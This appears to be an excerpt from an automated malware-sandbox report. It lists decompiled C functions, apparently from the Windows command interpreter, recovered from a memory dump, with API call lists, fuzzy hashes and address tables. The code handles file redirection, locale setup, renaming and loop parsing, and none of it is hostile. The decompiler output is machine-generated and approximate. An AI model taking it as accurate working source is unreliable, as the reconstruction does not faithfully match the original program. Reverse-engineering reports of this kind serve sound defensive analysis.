                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Volume$DriveInformationNamePathType_wcsicmp
                                • String ID: NTFS
                                • API String ID: 2534522608-1702600371
                                • Opcode ID: c1e84c8ecf239e3df955326fddf3a5d7bcf93cfcfa84f0600b4c707c10cbe7a8
                                • Instruction ID: 6c659cc1f5d5174412a39ca616f67a927f4849baaab55456be7567c77159e201
                                • Opcode Fuzzy Hash: c1e84c8ecf239e3df955326fddf3a5d7bcf93cfcfa84f0600b4c707c10cbe7a8
                                • Instruction Fuzzy Hash: 3C1186F5A22118AFDB14FBB1CE48DEA77BCFB09204F114576A606F2051EA70DA848B74
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56224D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 75%
                                			E4A56224D(void* __ecx, char _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				void* _t7;
				long _t8;
				signed int _t15;
				signed int _t16;
				void* _t18;

				_t1 =  &_a4; // 0x4a56223d
				_v16.bInheritHandle = 1;
				_v16.lpSecurityDescriptor = 0;
				_v16.nLength = 0xc;
				_t7 = CreateFileW(E4A552598(__ecx,  *_t1), 0x40000000, 0,  &_v16, 4, 0x8000080, 0);
				_t18 = _t7;
				if(_t18 == 0xffffffff) {
					_t8 = GetLastError();
					 *0x4a574128 = _t8;
					if(_t8 == 0x6e) {
						 *0x4a574128 = 2;
					}
					_t16 = _t15 | 0xffffffff;
				} else {
					__imp___open_osfhandle(_t18, 8);
					_t16 = _t7;
					if(_t16 == 0xffffffff) {
						CloseHandle(_t18);
					}
				}
				return _t16;
			}









                                0x4a562257
                                0x4a56225c
                                0x4a562263
                                0x4a562266
                                0x4a562285
                                0x4a56228b
                                0x4a562290
                                0x4a569cca
                                0x4a569cd0
                                0x4a569cd8
                                0x4a569cda
                                0x4a569cda
                                0x4a569ce4
                                0x4a562296
                                0x4a562299
                                0x4a56229f
                                0x4a5622a6
                                0x4a569ced
                                0x4a569ced
                                0x4a5622a6
                                0x4a5622b1

                                APIs
                                • CreateFileW.KERNEL32(00000000,40000000,00000000,0000000C,00000004,08000080,00000000), ref: 4A562285
                                • _open_osfhandle.MSVCRT ref: 4A562299
                                • GetLastError.KERNEL32(?,4A56223D,?), ref: 4A569CCA
                                • CloseHandle.KERNEL32(00000000), ref: 4A569CED
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseCreateErrorFileHandleLast_open_osfhandle
                                • String ID: ="VJ
                                • API String ID: 2775973614-1646542770
                                • Opcode ID: ed2f8b5fa8e4ba2855afe8aab4d9b720d0dd7584f3a246c4ea372617b99acbe5
                                • Instruction ID: ec19bdb7ca29438c77cb1d7e1073e4469c9fa7072e70cd367b90b9c5553252d9
                                • Opcode Fuzzy Hash: ed2f8b5fa8e4ba2855afe8aab4d9b720d0dd7584f3a246c4ea372617b99acbe5
                                • Instruction Fuzzy Hash: A001BCB1942210ABE7107B668A0DA8E3FB8AB86335F114216F529EB5D0DB704905CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A551690, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderthreadCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E4A551690() {
				struct HINSTANCE__* _t1;

				if( *0x4a5740d4 == 0) {
					_t1 =  *0x4a574094; // 0xffffffff
					if(_t1 != 0xffffffff) {
						L5:
						if(_t1 != 0) {
							 *0x4a5740d4 = GetProcAddress(_t1, "SetThreadUILanguage");
						}
						L7:
						if( *0x4a5740d4 != 0) {
							goto L1;
						}
						return SetThreadLocale(0x409);
					}
					_t1 = GetModuleHandleW(L"KERNEL32.DLL");
					 *0x4a574094 = _t1;
					if(_t1 == 0xffffffff) {
						goto L7;
					}
					goto L5;
				}
				L1:
				return  *0x4a5740d4(0);
			}




                                0x4a551697
                                0x4a55846a
                                0x4a558472
                                0x4a558489
                                0x4a55848b
                                0x4a558499
                                0x4a558499
                                0x4a55849e
                                0x4a5584a5
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56418c
                                0x4a558479
                                0x4a55847f
                                0x4a558487
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a558487
                                0x4a55169d
                                0x00000000

                                APIs
                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,4A557336,00000000), ref: 4A558479
                                • GetProcAddress.KERNEL32(FFFFFFFF,SetThreadUILanguage,4A557336,00000000), ref: 4A558493
                                • SetThreadLocale.KERNEL32(00000409,4A557336,00000000), ref: 4A56418C
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressHandleLocaleModuleProcThread
                                • String ID: KERNEL32.DLL$SetThreadUILanguage
                                • API String ID: 886074793-2530943252
                                • Opcode ID: 85b733951b55362cf185cb255255d4d1c64f2bcbc16ac02ccc9e7d3a157002bf
                                • Instruction ID: 747dcf93f49c89ec505d36d9bbca77d9d909fc62b1e114fb9b18514d40eb5df5
                                • Opcode Fuzzy Hash: 85b733951b55362cf185cb255255d4d1c64f2bcbc16ac02ccc9e7d3a157002bf
                                • Instruction Fuzzy Hash: DCF0ACFC546610DFE640BA3587087243E787B0232EF154A13EB2AEADECD7704854DB11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56DF2B, Relevance: 7.9, APIs: 5, Instructions: 358COMMON
                                Download Yara Rule
                                C-Code - Quality: 88%
                                			E4A56DF2B(signed int __edx, intOrPtr _a4) {
				signed int _v8;
				short _v12;
				short _v14;
				char _v16;
				short _v536;
				short _v1056;
				short _v1574;
				char _v1576;
				char _v1580;
				signed int* _v1584;
				signed int _v1588;
				signed int* _v1592;
				signed int _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t108;
				intOrPtr _t110;
				intOrPtr* _t119;
				signed int _t122;
				signed int _t123;
				void* _t124;
				signed int* _t125;
				signed int _t126;
				short _t127;
				short _t128;
				short _t129;
				short _t130;
				intOrPtr* _t132;
				void* _t137;
				intOrPtr _t138;
				signed int _t140;
				signed int _t146;
				signed char* _t148;
				intOrPtr* _t156;
				signed int _t159;
				signed int _t169;
				signed int _t170;
				long _t174;
				signed int _t178;
				signed int* _t180;
				signed int _t181;
				signed int _t182;
				intOrPtr* _t188;
				intOrPtr _t192;
				signed int _t194;
				long _t198;
				signed int* _t203;
				signed int* _t204;
				void* _t208;
				signed int* _t210;
				signed int* _t217;
				signed int _t220;
				signed int _t221;
				void* _t225;
				intOrPtr* _t227;
				signed int _t229;
				intOrPtr* _t231;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				void* _t241;
				signed int* _t242;
				signed int* _t244;
				signed int _t247;
				signed int _t253;

				_t240 = __edx;
				_t108 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t108 ^ _t253;
				_t110 = _a4;
				_t245 = 0;
				_push(0);
				_v1604 = _t110;
				L4A551BC7();
				_t219 = 0x4a574ac0;
				if(_t110 == 0) {
					_t244 = E4A5522CA( *((intOrPtr*)(_v1604 + 0x3c)), 0, 0);
					_v1584 = _t244;
					_t217 = E4A55413B(_t244);
					_v1592 = _t217;
					__eflags =  *_t244;
					if( *_t244 == 0) {
						L30:
						_push(0x232a);
						L11:
						L4A56DF02(_t219, _t240);
						L12:
						E4A55185A( &_v536, 0x104, 0x4a575260);
						E4A55185A( &_v1056, 0x104, 0x4a575260);
						_t119 =  &_v536;
						_t240 = _t119 + 2;
						do {
							_t220 =  *_t119;
							_t119 = _t119 + 2;
							__eflags = _t220;
						} while (_t220 != 0);
						_t219 = _t217[6];
						_t122 = _t119 - _t240 >> 1;
						__eflags =  *_t219 & 0x00000010;
						_v1588 = _t122;
						if(( *_t219 & 0x00000010) != 0) {
							_t123 = _t122 - 1;
							_v1588 = _t123;
							_t124 = _t123 + _t123;
							_t219 = 0;
							__eflags = 0;
							 *((short*)(_t253 + _t124 - 0x214)) = 0;
							 *((short*)(_t253 + _t124 - 0x41c)) = 0;
						} else {
							E4A5520A9(0x4a575260,  &_v536, 0x104, _t217[4]);
						}
						__eflags = _t217[7] & 0x00000008;
						if((_t217[7] & 0x00000008) != 0) {
							L20:
							_t125 = _v1592;
							__eflags =  *((short*)(_t125 + 2)) - 0x3a;
							if( *((short*)(_t125 + 2)) == 0x3a) {
								goto L30;
							}
							_t219 =  *0x4a590664 & 0x0000ffff;
							_t126 = E4A5518EB(_t125,  *0x4a590664 & 0x0000ffff);
							__eflags = _t126;
							if(_t126 != 0) {
								goto L30;
							}
							_t127 =  *0x4a575260; // 0x0
							_v1576 = _t127;
							_t128 = 0x3a;
							_v1574 = _t128;
							_t129 = 0x2a;
							_v16 = _t129;
							_t130 = 0x3f;
							_v14 = _t130;
							__eflags = 0;
							_v12 = 0;
							_t132 = _v1584;
							_t240 = _t132 + 2;
							do {
								_t221 =  *_t132;
								_t132 = _t132 + 2;
								__eflags = _t221;
							} while (_t221 != 0);
							_t247 = _t132 - _t240 >> 1;
							_t137 = E4A551996(_v1584,  &_v16);
							__eflags = _t137 - _t247;
							_t138 = 0x20;
							_v1600 = _t138;
							asm("sbb esi, esi");
							_t245 =  ~_t247;
							_t140 = E4A553117( &_v536, _t138, _t217[6],  &_v1580);
							__eflags = _t140;
							if(_t140 != 0) {
								L31:
								_t219 = 0;
								_t52 =  &_v1596;
								 *_t52 = _v1596 & 0;
								__eflags =  *_t52;
								 *(_t253 + _v1588 * 2 - 0x214) = 0;
								while(1) {
									__eflags =  *0x4a5741b4;
									if( *0x4a5741b4 != 0) {
										break;
									}
									_t148 = _t217[6];
									__eflags =  *_t148 & 0x00000010;
									if(( *_t148 & 0x00000010) == 0) {
										_t245 = _t253 + _v1588 * 2 - 0x214;
										 *(_t253 + _v1588 * 2 - 0x214) = 0;
										__eflags = _t217[6] + 0x2c;
										E4A5520A9(_t253 + _v1588 * 2 - 0x214,  &_v536, 0x104, _t217[6] + 0x2c);
										E4A561D9B(_t219,  &_v1576, 0x104, _v1592, _t253 + _v1588 * 2 - 0x214);
										_t156 =  &_v1576;
										_t225 = _t156 + 2;
										do {
											_t240 =  *_t156;
											_t156 = _t156 + 2;
											__eflags = _t240;
										} while (_t240 != 0);
										_t219 = _v1588;
										_t159 = _t156 - _t225 >> 1;
										__eflags = _t219 + _t159 + 1 - 0x104;
										if(_t219 + _t159 + 1 > 0x104) {
											L55:
											E4A552F5C(_v1580);
											E4A55963C();
											_push(0x232e);
											goto L11;
										}
										__eflags = 0;
										 *((short*)(_t253 + _t219 * 2 - 0x41c)) = 0;
										E4A5520A9(_t245,  &_v1056, 0x104,  &_v1576);
										L47:
										_t169 = MoveFileW( &_v536,  &_v1056);
										__eflags = _t169;
										if(_t169 == 0) {
											_t174 = GetLastError();
											__eflags = _t174 - 0xb7;
											if(_t174 == 0xb7) {
												_t174 = 0x234d;
											}
											_push(0);
											_v1596 = _t174;
											E4A556D44(_t219);
											_t219 = _t174;
										}
										_t170 = E4A5595F8(_t217[6], _v1600, _v1580);
										__eflags = _t170;
										if(_t170 != 0) {
											continue;
										} else {
											E4A552F5C(_v1580);
											E4A55963C();
											__eflags = _v1596;
											_t104 = _v1596 != 0;
											__eflags = _t104;
											_t146 = 0 | _t104;
											L53:
											return E4A5513A9(_t146, _t217, _v8 ^ _t253, _t240, 0x104, _t245);
										}
									}
									_t178 = E4A552148( &_v1056,  *0x4a590664 & 0x0000ffff);
									__eflags = _t178;
									if(_t178 == 0) {
										goto L55;
									}
									_t180 = _t178 + 2;
									__eflags = 0;
									 *_t180 = 0;
									_t227 = _v1592;
									_v1584 = _t180;
									_t241 = _t227 + 2;
									do {
										_t181 =  *_t227;
										_t227 = _t227 + 2;
										__eflags = _t181;
									} while (_t181 != 0);
									_t229 = _t227 - _t241;
									__eflags = _t229;
									_t182 = _t229 >> 1;
									_t231 =  &_v1056;
									_t245 = _t231 + 2;
									do {
										_t240 =  *_t231;
										_t231 = _t231 + 2;
										__eflags = _t240;
									} while (_t240 != 0);
									_t219 = _t231 - _t245 >> 1;
									__eflags = _t219 + _t182 + 1 - 0x104;
									if(_t219 + _t182 + 1 > 0x104) {
										goto L55;
									}
									__eflags = 0x104 - (_v1584 -  &_v1056 >> 1);
									E4A55185A(_v1584, 0x104 - (_v1584 -  &_v1056 >> 1), _v1592);
									_t188 =  &_v1056;
									_t240 = _t188 + 2;
									do {
										_t237 =  *_t188;
										_t188 = _t188 + 2;
										__eflags = _t237;
									} while (_t237 != 0);
									_t219 = 0;
									 *((short*)(_t253 + (_t188 - _t240 >> 1) * 2 - 0x41c)) = 0;
									goto L47;
								}
								E4A552F5C(_v1580);
								E4A55963C();
								goto L1;
							}
							_t192 = 0x10;
							_t219 =  &_v1580;
							_v1600 = _t192;
							_t194 = E4A553117( &_v536, _t192, _t217[6],  &_v1580);
							__eflags = _t194;
							if(_t194 != 0) {
								__eflags = _t245;
								if(_t245 == 0) {
									goto L31;
								}
								E4A552F5C(_v1580);
								goto L30;
							}
							__eflags =  *0x4a574128 - 0x12;
							if( *0x4a574128 == 0x12) {
								 *0x4a574128 = 2;
							}
							L10:
							_push( *0x4a574128);
						} else {
							_t198 = GetFileAttributesW(E4A552598(_t219,  &_v536));
							_t219 = _t217[6];
							 *(_t217[6]) = _t198;
							__eflags =  *(_t217[6]) - 0xffffffff;
							if( *(_t217[6]) != 0xffffffff) {
								goto L20;
							}
							_push(GetLastError());
						}
						goto L11;
					}
					__eflags =  *_t217;
					if( *_t217 == 0) {
						goto L30;
					}
					_t203 = E4A55413B(_t217);
					__eflags =  *_t203;
					if( *_t203 != 0) {
						goto L30;
					}
					_t204 = _t244;
					_t8 =  &(_t204[0]); // 0x2
					_t242 = _t8;
					do {
						_t239 =  *_t204;
						_t204 =  &(_t204[0]);
						__eflags = _t239;
					} while (_t239 != 0);
					_t208 = E4A552598(_t239, _t244);
					__eflags = (_t204 - _t242 >> 1) + 1;
					E4A55185A(_t244, (_t204 - _t242 >> 1) + 1, _t208);
					_t210 = _t217;
					_t9 =  &(_t210[0]); // 0x2
					_t219 = _t9;
					do {
						_t240 =  *_t210;
						_t210 =  &(_t210[0]);
						__eflags = _t240;
					} while (_t240 != 0);
					E4A55185A(_t217, (_t210 - _t219 >> 1) + 1, E4A552598(_t219, _t217));
					_t217 = E4A559662(_t219, _t240, __eflags, _t244);
					__eflags = _t217 - 1;
					if(_t217 != 1) {
						goto L12;
					}
					goto L10;
				}
				L1:
				_t146 = 1;
				goto L53;
			}







































































                                0x4a56df2b
                                0x4a56df36
                                0x4a56df3d
                                0x4a56df40
                                0x4a56df46
                                0x4a56df48
                                0x4a56df4e
                                0x4a56df54
                                0x4a56df5a
                                0x4a56df5d
                                0x4a56df77
                                0x4a56df7a
                                0x4a56df85
                                0x4a56df87
                                0x4a56df8d
                                0x4a56df90
                                0x4a56e1ab
                                0x4a56e1ab
                                0x4a56e009
                                0x4a56e009
                                0x4a56e00e
                                0x4a56e021
                                0x4a56e02f
                                0x4a56e034
                                0x4a56e03a
                                0x4a56e03d
                                0x4a56e03d
                                0x4a56e041
                                0x4a56e042
                                0x4a56e042
                                0x4a56e047
                                0x4a56e04c
                                0x4a56e04e
                                0x4a56e051
                                0x4a56e057
                                0x4a56e06b
                                0x4a56e06c
                                0x4a56e072
                                0x4a56e074
                                0x4a56e074
                                0x4a56e076
                                0x4a56e07e
                                0x4a56e059
                                0x4a56e064
                                0x4a56e064
                                0x4a56e086
                                0x4a56e08a
                                0x4a56e0b8
                                0x4a56e0b8
                                0x4a56e0be
                                0x4a56e0c3
                                0x00000000
                                0x00000000
                                0x4a56e0c9
                                0x4a56e0d2
                                0x4a56e0d7
                                0x4a56e0d9
                                0x00000000
                                0x00000000
                                0x4a56e0df
                                0x4a56e0e7
                                0x4a56e0ee
                                0x4a56e0ef
                                0x4a56e0f8
                                0x4a56e0f9
                                0x4a56e0ff
                                0x4a56e100
                                0x4a56e104
                                0x4a56e106
                                0x4a56e10a
                                0x4a56e110
                                0x4a56e113
                                0x4a56e113
                                0x4a56e117
                                0x4a56e118
                                0x4a56e118
                                0x4a56e121
                                0x4a56e12d
                                0x4a56e134
                                0x4a56e136
                                0x4a56e141
                                0x4a56e14e
                                0x4a56e151
                                0x4a56e153
                                0x4a56e158
                                0x4a56e15a
                                0x4a56e1b5
                                0x4a56e1bb
                                0x4a56e1bd
                                0x4a56e1bd
                                0x4a56e1bd
                                0x4a56e1ca
                                0x4a56e1cd
                                0x4a56e1cd
                                0x4a56e1d4
                                0x00000000
                                0x00000000
                                0x4a56e1da
                                0x4a56e1dd
                                0x4a56e1e0
                                0x4a56e29f
                                0x4a56e2a6
                                0x4a56e2ac
                                0x4a56e2b8
                                0x4a56e2cc
                                0x4a56e2d1
                                0x4a56e2d7
                                0x4a56e2da
                                0x4a56e2da
                                0x4a56e2de
                                0x4a56e2df
                                0x4a56e2df
                                0x4a56e2e6
                                0x4a56e2ec
                                0x4a56e2f2
                                0x4a56e2f4
                                0x4a56e3af
                                0x4a56e3b5
                                0x4a56e3ba
                                0x4a56e3bf
                                0x00000000
                                0x4a56e3bf
                                0x4a56e2fa
                                0x4a56e2fc
                                0x4a56e313
                                0x4a56e318
                                0x4a56e326
                                0x4a56e32c
                                0x4a56e32e
                                0x4a56e330
                                0x4a56e336
                                0x4a56e33b
                                0x4a56e33d
                                0x4a56e33d
                                0x4a56e342
                                0x4a56e345
                                0x4a56e34b
                                0x4a56e351
                                0x4a56e351
                                0x4a56e361
                                0x4a56e366
                                0x4a56e368
                                0x00000000
                                0x4a56e36e
                                0x4a56e374
                                0x4a56e379
                                0x4a56e380
                                0x4a56e386
                                0x4a56e386
                                0x4a56e386
                                0x4a56e389
                                0x4a56e397
                                0x4a56e397
                                0x4a56e368
                                0x4a56e1f5
                                0x4a56e1fa
                                0x4a56e1fc
                                0x00000000
                                0x00000000
                                0x4a56e203
                                0x4a56e204
                                0x4a56e206
                                0x4a56e209
                                0x4a56e20f
                                0x4a56e215
                                0x4a56e218
                                0x4a56e218
                                0x4a56e21c
                                0x4a56e21d
                                0x4a56e21d
                                0x4a56e222
                                0x4a56e222
                                0x4a56e226
                                0x4a56e228
                                0x4a56e22e
                                0x4a56e231
                                0x4a56e231
                                0x4a56e235
                                0x4a56e236
                                0x4a56e236
                                0x4a56e23d
                                0x4a56e243
                                0x4a56e245
                                0x00000000
                                0x00000000
                                0x4a56e263
                                0x4a56e26c
                                0x4a56e271
                                0x4a56e277
                                0x4a56e27a
                                0x4a56e27a
                                0x4a56e27e
                                0x4a56e27f
                                0x4a56e27f
                                0x4a56e288
                                0x4a56e28a
                                0x00000000
                                0x4a56e28a
                                0x4a56e3a0
                                0x4a56e3a5
                                0x00000000
                                0x4a56e3a5
                                0x4a56e15e
                                0x4a56e15f
                                0x4a56e169
                                0x4a56e177
                                0x4a56e17c
                                0x4a56e17e
                                0x4a56e19c
                                0x4a56e19e
                                0x00000000
                                0x00000000
                                0x4a56e1a6
                                0x00000000
                                0x4a56e1a6
                                0x4a56e180
                                0x4a56e187
                                0x4a56e18d
                                0x4a56e18d
                                0x4a56e003
                                0x4a56e003
                                0x4a56e08c
                                0x4a56e099
                                0x4a56e09f
                                0x4a56e0a2
                                0x4a56e0a7
                                0x4a56e0aa
                                0x00000000
                                0x00000000
                                0x4a56e0b2
                                0x4a56e0b2
                                0x00000000
                                0x4a56e08a
                                0x4a56df96
                                0x4a56df99
                                0x00000000
                                0x00000000
                                0x4a56dfa0
                                0x4a56dfa5
                                0x4a56dfa8
                                0x00000000
                                0x00000000
                                0x4a56dfae
                                0x4a56dfb0
                                0x4a56dfb0
                                0x4a56dfb3
                                0x4a56dfb3
                                0x4a56dfb7
                                0x4a56dfb8
                                0x4a56dfb8
                                0x4a56dfc4
                                0x4a56dfca
                                0x4a56dfcd
                                0x4a56dfd2
                                0x4a56dfd4
                                0x4a56dfd4
                                0x4a56dfd7
                                0x4a56dfd7
                                0x4a56dfdb
                                0x4a56dfdc
                                0x4a56dfdc
                                0x4a56dff1
                                0x4a56dffc
                                0x4a56dffe
                                0x4a56e001
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56e001
                                0x4a56df5f
                                0x4a56df61
                                0x00000000

                                APIs
                                • _setjmp3.MSVCRT ref: 4A56DF54
                                • GetFileAttributesW.KERNEL32(00000000,?,?,00000104,?,?,00000104,4A575260,?,00000104,4A575260,00000010,?,?,?,00000020), ref: 4A56E099
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AttributesFile_setjmp3
                                • String ID:
                                • API String ID: 4095645427-0
                                • Opcode ID: 028f0609fd3ab1c3d837cde41d5e43b09ca958d010dd71b6b8b07c12ae613a96
                                • Instruction ID: 871aabcdba3220ee8ff2b63bd6b637341e5cd2e7d7893d11e9c300aef803a30d
                                • Opcode Fuzzy Hash: 028f0609fd3ab1c3d837cde41d5e43b09ca958d010dd71b6b8b07c12ae613a96
                                • Instruction Fuzzy Hash: DFC1387190211ADADB25AF64CE84EEE7BB9EF84310F0045E6E80DEB155EB319E85CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55DEBE, Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                Download Yara Rule
                                C-Code - Quality: 98%
                                			E4A55DEBE(WCHAR** _a4) {
				signed int _v8;
				char _v72;
				WCHAR* _v76;
				long _v80;
				LPWSTR* _v84;
				signed int _v88;
				LPWSTR* _v92;
				long _v96;
				LPWSTR* _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t86;
				LPWSTR* _t88;
				signed int _t89;
				intOrPtr _t92;
				WCHAR** _t93;
				signed char _t95;
				wchar_t* _t96;
				wchar_t* _t98;
				long _t101;
				intOrPtr _t109;
				WCHAR** _t112;
				intOrPtr _t116;
				WCHAR* _t117;
				WCHAR* _t118;
				WCHAR* _t119;
				WCHAR* _t122;
				long _t123;
				short* _t124;
				LPWSTR* _t126;
				WCHAR** _t129;
				WCHAR** _t139;
				void* _t141;
				intOrPtr _t142;
				WCHAR** _t143;
				WCHAR* _t146;
				signed int _t148;
				signed int _t151;
				long _t153;
				WCHAR** _t155;
				signed int _t160;
				void* _t161;
				void* _t164;
				intOrPtr _t171;

				_t86 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t86 ^ _t160;
				_t158 = _a4;
				_t148 = 1;
				_v88 = 0;
				_v84 = 0;
				 *0x4a5740cc = 0;
				_v100 = 1;
				_t88 = E4A551896(0x24);
				_v92 = _t88;
				if(_t88 == 0) {
					L24:
					_t89 = _t148;
					L18:
					return E4A5513A9(_t89, 0, _v8 ^ _t160, _t144, _t148, _t158);
				}
				_t139 =  *0x4a5740bc; // 0x0
				if(_t139 == 0) {
					 *0x4a5740bc = E4A551896(4);
					_t92 = E4A551896(4);
					L5:
					 *0x4a5740c0 = _t92;
					_t93 =  *0x4a5740bc; // 0x0
					if(_t93 == 0) {
						goto L24;
					}
					_t171 =  *0x4a5740c0; // 0x0
					if(_t171 == 0) {
						goto L24;
					}
					_t141 = _v88 + _v88;
					 *((short*)(_t141 + _t93)) = _t158[0x11];
					_t144 =  *0x4a5740bc; // 0x0
					 *((short*)(_t141 +  &(_t144[0]))) = 0;
					_t95 = _t158[0x12];
					if((_t95 & 0x00000001) != 0) {
						_t96 = E4A5522CA(_t158[0xf], 0, 0);
						_v76 = _t96;
						_v80 = wcstol(_t96, 0, 0);
						_t98 = E4A55413B(_v76);
						_v76 = _t98;
						_v96 = wcstol(_t98, 0, 0);
						_t101 = wcstol(E4A55413B(_v76), 0, 0);
						_t164 = _t161 + 0x24;
						_v76 = _t101;
						_v92 = 0;
						while(1) {
							__eflags = _v96;
							if(_v96 < 0) {
								goto L30;
							}
							_t102 = _v76;
							__eflags = _v80 - _v76;
							if(_v80 > _v76) {
								L11:
								_t148 = _v88;
								if(_t148 == 0) {
									 *0x4a5740bc = 0;
									 *0x4a5740c0 = 0;
									L17:
									_t89 = _v84;
									goto L18;
								}
								_t143 =  *0x4a5740bc; // 0x0
								if(_t143 == 0) {
									__eflags =  *_t143;
									if( *_t143 != 0) {
										goto L13;
									}
									L16:
									_t116 =  *0x4a5740c0; // 0x0
									 *((intOrPtr*)(_t116 + _t148 * 4)) = 0;
									goto L17;
								}
								L13:
								_t112 = _t143;
								_t26 =  &(_t112[0]); // 0x2
								_t158 = _t26;
								do {
									_t146 =  *_t112;
									_t112 =  &(_t112[0]);
								} while (_t146 != 0);
								_t144 = 0;
								 *((short*)(_t143 + (_t112 - _t158 >> 1) * 2 - 2)) = 0;
								goto L16;
							}
							L27:
							E4A554B2A(E4A55DFFF(_t102));
							E4A55179D( &_v72, 0x20, E4A555104, _v80);
							_t142 =  *0x4a5740c0; // 0x0
							_t164 = _t164 + 0x10;
							_t151 = _v88 << 2;
							 *((intOrPtr*)(_t151 + _t142)) =  &_v72;
							_v84 = E4A55DBCE(0, _t144, _t151, _t158[0x10], _v100);
							_t109 =  *0x4a5740c0; // 0x0
							 *((intOrPtr*)(_t151 + _t109)) = 0;
							_v92 = E4A55DC07(_v92);
							_v80 = _v80 + _v96;
							_v100 = 0;
							continue;
							L30:
							_t102 = _v80;
							__eflags = _v80 - _v76;
							if(_v80 >= _v76) {
								goto L27;
							}
							goto L11;
						}
					}
					_t173 = _t95 & 0x00000008;
					if((_t95 & 0x00000008) == 0) {
						__eflags = _t95 & 0x00000004;
						if((_t95 & 0x00000004) != 0) {
							_t117 = _t158[0x13];
							__eflags = _t117;
							if(_t117 == 0) {
								_t117 = 0x4a564cac;
							}
							_t118 = E4A552598(_t141, _t117);
							_v80 = _t118;
							_t119 = GetFullPathNameW(_t118, 0, 0, 0);
							_v96 = _t119;
							__eflags = _t119;
							if(_t119 == 0) {
								L42:
								_t158 = 1;
								E4A556D44(_t141, 0x400023d9, 1, _v80);
								_v84 = 1;
							} else {
								_t122 = E4A551896(_t119 +  &(_t119[1]));
								_v76 = _t122;
								__eflags = _t122;
								if(_t122 != 0) {
									_t123 = GetFullPathNameW(_v80, _v96, _t122, 0);
									__eflags = _t123;
									if(_t123 == 0) {
										goto L42;
									}
									_t153 = _v96;
									__eflags = _t123 - _t153;
									if(_t123 >= _t153) {
										goto L42;
									}
									_t124 = E4A552ED1(_v76);
									__eflags =  *_t124 - 0x5c;
									if( *_t124 != 0x5c) {
										__eflags = _t153 + 1;
										E4A5520A9(_t158, _v76, _t153 + 1, E4A552EC8);
									}
									_t126 = E4A56BF0C(_v76, _t158, _v92, _v88, E4A5522CA(_t158[0xf], 0, 0));
									L10:
									_v84 = _t126;
									goto L11;
								}
								_v84 = 1;
							}
							goto L11;
						}
						_t126 = E4A55E342(_t158, _v92, _v88, E4A5522CA(_t158[0xf], 0, 0), _t148);
						goto L10;
					}
					_t126 = E4A55E46C(_t173, _t158, _v88, _t148);
					goto L10;
				}
				_t129 = _t139;
				_t7 =  &(_t129[0]); // 0x2
				_t155 = _t7;
				do {
					_t144 =  *_t129;
					_t129 =  &(_t129[0]);
				} while (_t144 != 0);
				_t9 = (_t129 - _t155 >> 1) + 4; // 0x6
				_v88 = _t129 - _t155 >> 1;
				 *0x4a5740bc = E4A552536(_t139, (_t129 - _t155 >> 1) + _t9);
				_t92 = E4A552536( *0x4a5740c0, 4 + (_t129 - _t155 >> 1) * 4);
				_t148 = 1;
				goto L5;
			}
















































                                0x4a55dec6
                                0x4a55decd
                                0x4a55ded2
                                0x4a55deda
                                0x4a55dedd
                                0x4a55dee0
                                0x4a55dee3
                                0x4a55dee9
                                0x4a55deec
                                0x4a55def1
                                0x4a55def6
                                0x4a55f44f
                                0x4a55f44f
                                0x4a55dfde
                                0x4a55dfec
                                0x4a55dfec
                                0x4a55defc
                                0x4a55df04
                                0x4a55fdd5
                                0x4a55fdda
                                0x4a55df48
                                0x4a55df48
                                0x4a55df4d
                                0x4a55df54
                                0x00000000
                                0x00000000
                                0x4a55df5a
                                0x4a55df60
                                0x00000000
                                0x00000000
                                0x4a55df6d
                                0x4a55df6f
                                0x4a55df73
                                0x4a55df7b
                                0x4a55df80
                                0x4a55df85
                                0x4a55f937
                                0x4a55f945
                                0x4a55f950
                                0x4a55f953
                                0x4a55f95b
                                0x4a55f966
                                0x4a55f971
                                0x4a55f973
                                0x4a55f976
                                0x4a55f979
                                0x4a55f8bf
                                0x4a55f8bf
                                0x4a55f8c2
                                0x00000000
                                0x00000000
                                0x4a55f8c8
                                0x4a55f8cb
                                0x4a55f8ce
                                0x4a55dfa0
                                0x4a55dfa0
                                0x4a55dfa5
                                0x4a55f430
                                0x4a55f436
                                0x4a55dfdb
                                0x4a55dfdb
                                0x00000000
                                0x4a55dfdb
                                0x4a55dfab
                                0x4a55dfb3
                                0x4a55f441
                                0x4a55f444
                                0x00000000
                                0x00000000
                                0x4a55dfd3
                                0x4a55dfd3
                                0x4a55dfd8
                                0x00000000
                                0x4a55dfd8
                                0x4a55dfb9
